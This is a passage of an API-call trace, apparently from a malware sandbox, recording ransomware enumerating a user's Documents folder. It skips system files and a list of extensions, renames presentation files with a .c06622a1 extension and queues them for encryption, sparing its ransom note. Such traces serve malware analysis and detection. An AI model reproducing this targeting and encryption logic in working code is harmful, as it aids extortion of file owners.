[0149.308] wcslen (_String="ics") returned 0x3 [0149.308] _wcsicmp (_Str1="idx", _Str2="pptx") returned -7 [0149.308] wcslen (_String="idx") returned 0x3 [0149.308] _wcsicmp (_Str1="ldf", _Str2="pptx") returned -4 [0149.308] wcslen (_String="ldf") returned 0x3 [0149.308] _wcsicmp (_Str1="lnk", _Str2="pptx") returned -4 [0149.308] wcslen (_String="lnk") returned 0x3 [0149.308] _wcsicmp (_Str1="mod", _Str2="pptx") returned -3 [0149.308] wcslen (_String="mod") returned 0x3 [0149.308] _wcsicmp (_Str1="mpa", _Str2="pptx") returned -3 [0149.308] wcslen (_String="mpa") returned 0x3 [0149.308] _wcsicmp (_Str1="msc", _Str2="pptx") returned -3 [0149.308] wcslen (_String="msc") returned 0x3 [0149.308] _wcsicmp (_Str1="msp", _Str2="pptx") returned -3 [0149.308] wcslen (_String="msp") returned 0x3 [0149.308] _wcsicmp (_Str1="msstyles", _Str2="pptx") returned -3 [0149.308] wcslen (_String="msstyles") returned 0x8 [0149.308] _wcsicmp (_Str1="msu", _Str2="pptx") returned -3 [0149.308] wcslen (_String="msu") returned 0x3 [0149.308] _wcsicmp (_Str1="nls", _Str2="pptx") returned -2 [0149.308] wcslen (_String="nls") returned 0x3 [0149.308] _wcsicmp (_Str1="nomedia", _Str2="pptx") returned -2 [0149.308] wcslen (_String="nomedia") returned 0x7 [0149.308] _wcsicmp (_Str1="ocx", _Str2="pptx") returned -1 [0149.308] wcslen (_String="ocx") returned 0x3 [0149.308] _wcsicmp (_Str1="prf", _Str2="pptx") returned 2 [0149.308] wcslen (_String="prf") returned 0x3 [0149.308] _wcsicmp (_Str1="ps1", _Str2="pptx") returned 3 [0149.309] wcslen (_String="ps1") returned 0x3 [0149.309] _wcsicmp (_Str1="rom", _Str2="pptx") returned 2 [0149.309] wcslen (_String="rom") returned 0x3 [0149.309] _wcsicmp (_Str1="rtp", _Str2="pptx") returned 2 [0149.309] wcslen (_String="rtp") returned 0x3 [0149.309] _wcsicmp (_Str1="scr", _Str2="pptx") returned 3 [0149.309] wcslen (_String="scr") returned 0x3 [0149.309] _wcsicmp (_Str1="shs", _Str2="pptx") returned 3 [0149.309] wcslen (_String="shs") returned 0x3 [0149.309] _wcsicmp (_Str1="spl", _Str2="pptx") returned 3 [0149.309] wcslen (_String="spl") returned 0x3 [0149.309] _wcsicmp (_Str1="sys", _Str2="pptx") returned 3 [0149.309] wcslen (_String="sys") returned 0x3 [0149.309] _wcsicmp (_Str1="theme", _Str2="pptx") returned 4 [0149.309] wcslen (_String="theme") returned 0x5 [0149.309] _wcsicmp (_Str1="themepack", _Str2="pptx") returned 4 [0149.309] wcslen (_String="themepack") returned 0x9 [0149.309] _wcsicmp (_Str1="wpx", _Str2="pptx") returned 7 [0149.309] wcslen (_String="wpx") returned 0x3 [0149.309] _wcsicmp (_Str1="lock", _Str2="pptx") returned -4 [0149.309] wcslen (_String="lock") returned 0x4 [0149.309] _wcsicmp (_Str1="key", _Str2="pptx") returned -5 [0149.309] wcslen (_String="key") returned 0x3 [0149.309] _wcsicmp (_Str1="hta", _Str2="pptx") returned -8 [0149.309] wcslen (_String="hta") returned 0x3 [0149.309] _wcsicmp (_Str1="msi", _Str2="pptx") returned -3 [0149.309] wcslen (_String="msi") returned 0x3 [0149.309] _wcsicmp (_Str1="pdb", _Str2="pptx") returned -12 [0149.309] wcslen (_String="pdb") returned 0x3 [0149.310] _wcsicmp (_Str1="sql", _Str2="pptx") returned 3 [0149.310] wcslen (_String="sql") returned 0x3 [0149.310] _wcsicmp (_Str1="sqlite", _Str2="pptx") returned 3 [0149.310] wcslen (_String="sqlite") returned 0x6 [0149.310] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7")) returned 0x10 [0149.310] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.310] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" [0149.310] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned 0x3a [0149.310] wcscpy (in: _Dest=0x453011e, _Source="Ubtm8V.pptx" | out: _Dest="Ubtm8V.pptx") returned="Ubtm8V.pptx" [0149.310] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\Ubtm8V.pptx", dwFileAttributes=0x80) returned 1 [0149.310] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\Ubtm8V.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\ubtm8v.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0149.310] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.311] ReadFile (in: hFile=0x640, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.311] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xdf5c3e23 [0149.311] RtlComputeCrc32 (PartialCrc=0x3e23, Buffer=0x3fe674, Length=0x80) returned 0x5fed0231 [0149.311] RtlComputeCrc32 (PartialCrc=0x231, Buffer=0x3fe674, Length=0x80) returned 0xe2ae6f45 [0149.311] RtlComputeCrc32 (PartialCrc=0x6f45, Buffer=0x3fe674, Length=0x80) returned 0x2ff68033 [0149.312] RtlComputeCrc32 (PartialCrc=0x8033, Buffer=0x3fe674, Length=0x80) returned 0xbc71ac66 [0149.312] CloseHandle (hObject=0x640) returned 1 [0149.312] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.312] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\Ubtm8V.pptx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\Ubtm8V.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\Ubtm8V.pptx" [0149.312] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\Ubtm8V.pptx") returned 0x46 [0149.312] wcscpy (in: _Dest=0x454013c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.312] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\Ubtm8V.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\ubtm8v.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\Ubtm8V.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\ubtm8v.pptx.c06622a1"), dwFlags=0x8) returned 1 [0149.315] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\Ubtm8V.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\ubtm8v.pptx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x640 [0149.315] CreateIoCompletionPort (FileHandle=0x640, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0149.315] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4a60020 [0149.321] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x178ec45d [0149.321] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xe4e6711 [0149.321] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6fc9cb22 [0149.321] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x20a62318 [0149.321] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x399b0467 [0149.321] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x233985d7 [0149.321] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5971b48b [0149.321] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3ada379a [0149.325] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4a60094, Length=0x80) returned 0x9d9cfa9b [0149.325] RtlComputeCrc32 (PartialCrc=0xfa9b, Buffer=0x4a60094, Length=0x80) returned 0xcebaeefe [0149.325] RtlComputeCrc32 (PartialCrc=0xeefe, Buffer=0x4a60094, Length=0x80) returned 0x724f0c8f [0149.325] RtlComputeCrc32 (PartialCrc=0xc8f, Buffer=0x4a60094, Length=0x80) returned 0xb845f3ac [0149.325] RtlComputeCrc32 (PartialCrc=0xf3ac, Buffer=0x4a60094, Length=0x80) returned 0xe0b912e [0149.325] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4a60020) returned 1 [0149.325] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.325] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.325] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b6b2080, ftCreationTime.dwHighDateTime=0x1d5df02, ftLastAccessTime.dwLowDateTime=0x7450c6b0, ftLastAccessTime.dwHighDateTime=0x1d5de6d, ftLastWriteTime.dwLowDateTime=0x7450c6b0, ftLastWriteTime.dwHighDateTime=0x1d5de6d, nFileSizeHigh=0x0, nFileSizeLow=0x1106f, dwReserved0=0x0, dwReserved1=0x0, cFileName="W45RP6btixzZE.pps", cAlternateFileName="W45RP6~1.PPS")) returned 1 [0149.325] _wcsicmp (_Str1="W45RP6btixzZE.pps", _Str2="README.c06622a1.TXT") returned 5 [0149.325] wcsstr (_Str="W45RP6btixzZE.pps", _SubStr="README") returned 0x0 [0149.325] _wcsicmp (_Str1="autorun.inf", _Str2="W45RP6btixzZE.pps") returned -22 [0149.325] wcslen (_String="autorun.inf") returned 0xb [0149.325] _wcsicmp (_Str1="boot.ini", _Str2="W45RP6btixzZE.pps") returned -21 [0149.325] wcslen (_String="boot.ini") returned 0x8 [0149.325] _wcsicmp (_Str1="bootfont.bin", _Str2="W45RP6btixzZE.pps") returned -21 [0149.325] wcslen (_String="bootfont.bin") returned 0xc [0149.325] _wcsicmp (_Str1="bootsect.bak", _Str2="W45RP6btixzZE.pps") returned -21 [0149.325] wcslen (_String="bootsect.bak") returned 0xc [0149.325] _wcsicmp (_Str1="desktop.ini", _Str2="W45RP6btixzZE.pps") returned -19 [0149.325] wcslen (_String="desktop.ini") returned 0xb [0149.325] _wcsicmp (_Str1="iconcache.db", _Str2="W45RP6btixzZE.pps") returned -14 [0149.325] wcslen (_String="iconcache.db") returned 0xc [0149.325] _wcsicmp (_Str1="ntldr", _Str2="W45RP6btixzZE.pps") returned -9 [0149.325] wcslen (_String="ntldr") returned 0x5 [0149.325] _wcsicmp (_Str1="ntuser.dat", _Str2="W45RP6btixzZE.pps") returned -9 [0149.325] wcslen (_String="ntuser.dat") returned 0xa [0149.325] _wcsicmp (_Str1="ntuser.dat.log", _Str2="W45RP6btixzZE.pps") returned -9 [0149.325] wcslen (_String="ntuser.dat.log") returned 0xe [0149.326] _wcsicmp (_Str1="ntuser.ini", _Str2="W45RP6btixzZE.pps") returned -9 [0149.326] wcslen (_String="ntuser.ini") returned 0xa [0149.326] _wcsicmp (_Str1="thumbs.db", _Str2="W45RP6btixzZE.pps") returned -3 [0149.326] wcslen (_String="thumbs.db") returned 0x9 [0149.326] _wcsicmp (_Str1="386", _Str2="pps") returned -61 [0149.326] wcslen (_String="386") returned 0x3 [0149.326] _wcsicmp (_Str1="adv", _Str2="pps") returned -15 [0149.326] wcslen (_String="adv") returned 0x3 [0149.326] _wcsicmp (_Str1="ani", _Str2="pps") returned -15 [0149.326] wcslen (_String="ani") returned 0x3 [0149.326] _wcsicmp (_Str1="bat", _Str2="pps") returned -14 [0149.326] wcslen (_String="bat") returned 0x3 [0149.326] _wcsicmp (_Str1="bin", _Str2="pps") returned -14 [0149.326] wcslen (_String="bin") returned 0x3 [0149.326] _wcsicmp (_Str1="cab", _Str2="pps") returned -13 [0149.326] wcslen (_String="cab") returned 0x3 [0149.326] _wcsicmp (_Str1="cmd", _Str2="pps") returned -13 [0149.326] wcslen (_String="cmd") returned 0x3 [0149.326] _wcsicmp (_Str1="com", _Str2="pps") returned -13 [0149.326] wcslen (_String="com") returned 0x3 [0149.326] _wcsicmp (_Str1="cpl", _Str2="pps") returned -13 [0149.326] wcslen (_String="cpl") returned 0x3 [0149.326] _wcsicmp (_Str1="cur", _Str2="pps") returned -13 [0149.326] wcslen (_String="cur") returned 0x3 [0149.326] _wcsicmp (_Str1="deskthemepack", _Str2="pps") returned -12 [0149.326] wcslen (_String="deskthemepack") returned 0xd [0149.326] _wcsicmp (_Str1="diagcab", _Str2="pps") returned -12 [0149.326] wcslen (_String="diagcab") returned 0x7 [0149.326] _wcsicmp (_Str1="diagcfg", _Str2="pps") returned -12 [0149.326] wcslen (_String="diagcfg") returned 0x7 [0149.326] _wcsicmp (_Str1="diagpkg", _Str2="pps") returned -12 [0149.326] wcslen (_String="diagpkg") returned 0x7 [0149.326] _wcsicmp (_Str1="dll", _Str2="pps") returned -12 [0149.326] wcslen (_String="dll") returned 0x3 [0149.326] _wcsicmp (_Str1="drv", _Str2="pps") returned -12 [0149.326] wcslen (_String="drv") returned 0x3 [0149.326] _wcsicmp (_Str1="exe", _Str2="pps") returned -11 [0149.326] wcslen (_String="exe") returned 0x3 [0149.327] _wcsicmp (_Str1="hlp", _Str2="pps") returned -8 [0149.327] wcslen (_String="hlp") returned 0x3 [0149.327] _wcsicmp (_Str1="icl", _Str2="pps") returned -7 [0149.327] wcslen (_String="icl") returned 0x3 [0149.327] _wcsicmp (_Str1="icns", _Str2="pps") returned -7 [0149.327] wcslen (_String="icns") returned 0x4 [0149.327] _wcsicmp (_Str1="ico", _Str2="pps") returned -7 [0149.327] wcslen (_String="ico") returned 0x3 [0149.327] _wcsicmp (_Str1="ics", _Str2="pps") returned -7 [0149.327] wcslen (_String="ics") returned 0x3 [0149.327] _wcsicmp (_Str1="idx", _Str2="pps") returned -7 [0149.327] wcslen (_String="idx") returned 0x3 [0149.327] _wcsicmp (_Str1="ldf", _Str2="pps") returned -4 [0149.327] wcslen (_String="ldf") returned 0x3 [0149.327] _wcsicmp (_Str1="lnk", _Str2="pps") returned -4 [0149.327] wcslen (_String="lnk") returned 0x3 [0149.327] _wcsicmp (_Str1="mod", _Str2="pps") returned -3 [0149.327] wcslen (_String="mod") returned 0x3 [0149.327] _wcsicmp (_Str1="mpa", _Str2="pps") returned -3 [0149.327] wcslen (_String="mpa") returned 0x3 [0149.327] _wcsicmp (_Str1="msc", _Str2="pps") returned -3 [0149.327] wcslen (_String="msc") returned 0x3 [0149.327] _wcsicmp (_Str1="msp", _Str2="pps") returned -3 [0149.327] wcslen (_String="msp") returned 0x3 [0149.327] _wcsicmp (_Str1="msstyles", _Str2="pps") returned -3 [0149.327] wcslen (_String="msstyles") returned 0x8 [0149.327] _wcsicmp (_Str1="msu", _Str2="pps") returned -3 [0149.327] wcslen (_String="msu") returned 0x3 [0149.327] _wcsicmp (_Str1="nls", _Str2="pps") returned -2 [0149.327] wcslen (_String="nls") returned 0x3 [0149.327] _wcsicmp (_Str1="nomedia", _Str2="pps") returned -2 [0149.327] wcslen (_String="nomedia") returned 0x7 [0149.327] _wcsicmp (_Str1="ocx", _Str2="pps") returned -1 [0149.327] wcslen (_String="ocx") returned 0x3 [0149.327] _wcsicmp (_Str1="prf", _Str2="pps") returned 2 [0149.327] wcslen (_String="prf") returned 0x3 [0149.327] _wcsicmp (_Str1="ps1", _Str2="pps") returned 3 [0149.327] wcslen (_String="ps1") returned 0x3 [0149.328] _wcsicmp (_Str1="rom", _Str2="pps") returned 2 [0149.328] wcslen (_String="rom") returned 0x3 [0149.328] _wcsicmp (_Str1="rtp", _Str2="pps") returned 2 [0149.328] wcslen (_String="rtp") returned 0x3 [0149.328] _wcsicmp (_Str1="scr", _Str2="pps") returned 3 [0149.328] wcslen (_String="scr") returned 0x3 [0149.328] _wcsicmp (_Str1="shs", _Str2="pps") returned 3 [0149.328] wcslen (_String="shs") returned 0x3 [0149.328] _wcsicmp (_Str1="spl", _Str2="pps") returned 3 [0149.328] wcslen (_String="spl") returned 0x3 [0149.328] _wcsicmp (_Str1="sys", _Str2="pps") returned 3 [0149.328] wcslen (_String="sys") returned 0x3 [0149.328] _wcsicmp (_Str1="theme", _Str2="pps") returned 4 [0149.328] wcslen (_String="theme") returned 0x5 [0149.328] _wcsicmp (_Str1="themepack", _Str2="pps") returned 4 [0149.328] wcslen (_String="themepack") returned 0x9 [0149.328] _wcsicmp (_Str1="wpx", _Str2="pps") returned 7 [0149.328] wcslen (_String="wpx") returned 0x3 [0149.328] _wcsicmp (_Str1="lock", _Str2="pps") returned -4 [0149.328] wcslen (_String="lock") returned 0x4 [0149.328] _wcsicmp (_Str1="key", _Str2="pps") returned -5 [0149.328] wcslen (_String="key") returned 0x3 [0149.328] _wcsicmp (_Str1="hta", _Str2="pps") returned -8 [0149.328] wcslen (_String="hta") returned 0x3 [0149.328] _wcsicmp (_Str1="msi", _Str2="pps") returned -3 [0149.328] wcslen (_String="msi") returned 0x3 [0149.328] _wcsicmp (_Str1="pdb", _Str2="pps") returned -12 [0149.328] wcslen (_String="pdb") returned 0x3 [0149.328] _wcsicmp (_Str1="sql", _Str2="pps") returned 3 [0149.328] wcslen (_String="sql") returned 0x3 [0149.328] _wcsicmp (_Str1="sqlite", _Str2="pps") returned 3 [0149.328] wcslen (_String="sqlite") returned 0x6 [0149.328] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7")) returned 0x10 [0149.328] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.328] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" [0149.329] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned 0x3a [0149.329] wcscpy (in: _Dest=0x453011e, _Source="W45RP6btixzZE.pps" | out: _Dest="W45RP6btixzZE.pps") returned="W45RP6btixzZE.pps" [0149.329] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\W45RP6btixzZE.pps", dwFileAttributes=0x80) returned 1 [0149.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\W45RP6btixzZE.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\w45rp6btixzze.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x654 [0149.329] SetFilePointerEx (in: hFile=0x654, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.329] ReadFile (in: hFile=0x654, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.330] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xe750e490 [0149.330] RtlComputeCrc32 (PartialCrc=0xe490, Buffer=0x3fe674, Length=0x80) returned 0xdab3cb8c [0149.330] RtlComputeCrc32 (PartialCrc=0xcb8c, Buffer=0x3fe674, Length=0x80) returned 0x2f3c6b4c [0149.330] RtlComputeCrc32 (PartialCrc=0x6b4c, Buffer=0x3fe674, Length=0x80) returned 0xb57cb042 [0149.330] RtlComputeCrc32 (PartialCrc=0xb042, Buffer=0x3fe674, Length=0x80) returned 0x64de699f [0149.330] CloseHandle (hObject=0x654) returned 1 [0149.330] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.330] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\W45RP6btixzZE.pps" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\W45RP6btixzZE.pps") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\W45RP6btixzZE.pps" [0149.330] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\W45RP6btixzZE.pps") returned 0x4c [0149.330] wcscpy (in: _Dest=0x4540148, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.330] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\W45RP6btixzZE.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\w45rp6btixzze.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\W45RP6btixzZE.pps.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\w45rp6btixzze.pps.c06622a1"), dwFlags=0x8) returned 1 [0149.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\W45RP6btixzZE.pps.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\w45rp6btixzze.pps.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x654 [0149.332] CreateIoCompletionPort (FileHandle=0x654, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.332] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4af0020 [0149.337] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4e03c686 [0149.337] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5b57c425 [0149.337] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x265e952a [0149.337] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x68bc4a93 [0149.337] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2c192991 [0149.338] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x425d3630 [0149.338] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1502cf9b [0149.338] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3cc74659 [0149.341] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4af0094, Length=0x80) returned 0xc39c4fdf [0149.341] RtlComputeCrc32 (PartialCrc=0x4fdf, Buffer=0x4af0094, Length=0x80) returned 0x892e9503 [0149.341] RtlComputeCrc32 (PartialCrc=0x9503, Buffer=0x4af0094, Length=0x80) returned 0x27ef8e33 [0149.341] RtlComputeCrc32 (PartialCrc=0x8e33, Buffer=0x4af0094, Length=0x80) returned 0x35f40362 [0149.341] RtlComputeCrc32 (PartialCrc=0x362, Buffer=0x4af0094, Length=0x80) returned 0x868330ad [0149.341] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4af0020) returned 1 [0149.341] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.341] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.341] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.341] FindClose (in: hFindFile=0x2db87c0 | out: hFindFile=0x2db87c0) returned 1 [0149.341] _wcsicmp (_Str1="backup", _Str2="F8m820x7") returned -4 [0149.341] wcslen (_String="backup") returned 0x6 [0149.341] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0149.341] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0149.341] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd77e1d20, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd77e1d20, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd77e1d20, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0149.341] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0149.341] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0a576c0, ftCreationTime.dwHighDateTime=0x1d5e368, ftLastAccessTime.dwLowDateTime=0x29ed8540, ftLastAccessTime.dwHighDateTime=0x1d5e47b, ftLastWriteTime.dwLowDateTime=0x29ed8540, ftLastWriteTime.dwHighDateTime=0x1d5e47b, nFileSizeHigh=0x0, nFileSizeLow=0x108cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="SZALzgsX8YNlgm.rtf", cAlternateFileName="SZALZG~1.RTF")) returned 1 [0149.341] _wcsicmp (_Str1="SZALzgsX8YNlgm.rtf", _Str2="README.c06622a1.TXT") returned 1 [0149.342] wcsstr (_Str="SZALzgsX8YNlgm.rtf", _SubStr="README") returned 0x0 [0149.342] _wcsicmp (_Str1="autorun.inf", _Str2="SZALzgsX8YNlgm.rtf") returned -18 [0149.342] wcslen (_String="autorun.inf") returned 0xb [0149.342] _wcsicmp (_Str1="boot.ini", _Str2="SZALzgsX8YNlgm.rtf") returned -17 [0149.342] wcslen (_String="boot.ini") returned 0x8 [0149.342] _wcsicmp (_Str1="bootfont.bin", _Str2="SZALzgsX8YNlgm.rtf") returned -17 [0149.342] wcslen (_String="bootfont.bin") returned 0xc [0149.342] _wcsicmp (_Str1="bootsect.bak", _Str2="SZALzgsX8YNlgm.rtf") returned -17 